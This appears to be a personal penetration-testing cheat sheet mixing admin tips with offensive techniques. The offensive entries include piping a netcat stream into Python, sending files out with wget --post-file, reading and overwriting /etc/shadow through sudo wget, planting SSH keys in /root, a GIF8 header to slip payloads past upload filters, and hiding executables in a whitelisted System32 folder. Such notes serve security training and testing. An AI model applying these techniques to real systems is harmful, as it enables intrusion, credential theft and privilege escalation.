Table of Contents
General
- Put
GIF8;
on top of payload to make it a GIT image file type.
Linux
Metasploit
Import xml to database.
nmap -Pn -sS -A -oX Subnet1 192.168.1.0/24
msf > db_connect postgres:toor@127.0.0.1/msf3
msf > db_import Subnet1.xml
msf > db_hosts -c address
Hosts
=====
address
-------
192.168.1.1
192.168.1.10
192.168.1.101
192.168.1.102
192.168.1.109
192.168.1.116
192.168.1.142
192.168.1.152
192.168.1.154
192.168.1.171
192.168.1.155
192.168.1.174
192.168.1.180
192.168.1.181
192.168.1.2
192.168.1.99
msf >
Port Forwarding
In ssh, type
~C
And you'll go into SSH interactive mode.
Then
-L 9905:127.0.0.1:6666
And, use following command to cancel it.
~C
-KL 9905
Sed
# change some text to other things (tab here)
sed 's/<text>/\t/g'
Less
# disable word wrap
less -S
SSH
If encounter key algorithm error, just use the following
ssh -okexAlgorithms=+diffie-hellman-gourp1-sha1
SSH Tunnel
# run all traffic to 9000 through tun-remote-ip to bypass maybe blacklist
ssh -i key -L9000:remote-ip:port tun-remote-ip
# or, run all traffic through socks proxy locahost:1080
ssh -D1080 remote-ip-you-have-access
# listen on local port and run all traffic to remote port through ssh
# forward traffic to local port 9901 and 9002 to remote host's 127.0.0.1 port 5801 and 5901
ssh -L9001:127.0.0.1:5801 -L9002:127.0.0.1:5901 user@host
Bash
Environment variable can be sliced like string in python (linux, not BSD)
x=abc
echo $x # abc
echo ${x:1:1} #b
In Linux, printf '\x41'
prints 'A', but in BSD it prints 'x41'
NetCat
# pipe something to nc and when someone connects the file just get sent
nc ip port < file
# other side, connect and pipe to whatever program like python
nc ip port | python
Nmap
Bootstrap nmap xml result to a beautiful web page.
https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl
nmap ... --stylesheet <path-to-xsl>
Wget
# read any file you have permission to
wget -i /etc/shadow
# upload file
wget --post-file=FILE <host>:<port>/upload.php?filename=<FILE-NAME>
# create a .ssh folder locally, generate a key pair, mv id_rsa.pub to authorized_keys, and use wget to mirror the folder to target
wget -P /root/ -nH -m <ip>:<port>
PHP File Upload Script and Web Server
If you have a user shell which has the permission to read the /etc/shadow file, just upload the file to your local machine, change the hash to something you want, and re-download it. Like with the wget command. User has sudo permission to use wget, so you can upload /etc/shadow with wget, and redownload it to /etc/shadow to override the former file content.
# php upload file script
<?php
$fname = basename($_REQUEST['filename']);
file_put_contents('upload/', $fname, file_get_contents('php://input'));
?>
# umask 555 to make the folder only writable but not readable to anyone else
mkdir upload; chmod 222 upload
# start php web server
php -S <ip>:<port> -t .
Tcpdump
Check if a server we own is reponding, run the command, and execute a ping on the target, if succeed, icmp request will be captured by tcpdump
tcpdump -nnvXSs 0 -c2 icmp
Windows
# system white list system32 folder, put .exe here to avoid being intercepted
C:\Windows\System32\spool\drivers\color
Burp Suite
In Proxy -> Options -> Match and Replace
, you can add request headers to be applied to each request.
Open Source Web App
Download the open source web app. Search for version string in the source files, and get the file that contains the version string.
grep -R <version> . | awk -F: '{print $1}' | uniq
Then, take the file name to the browser to see what the server responds. May find file inclusion as well.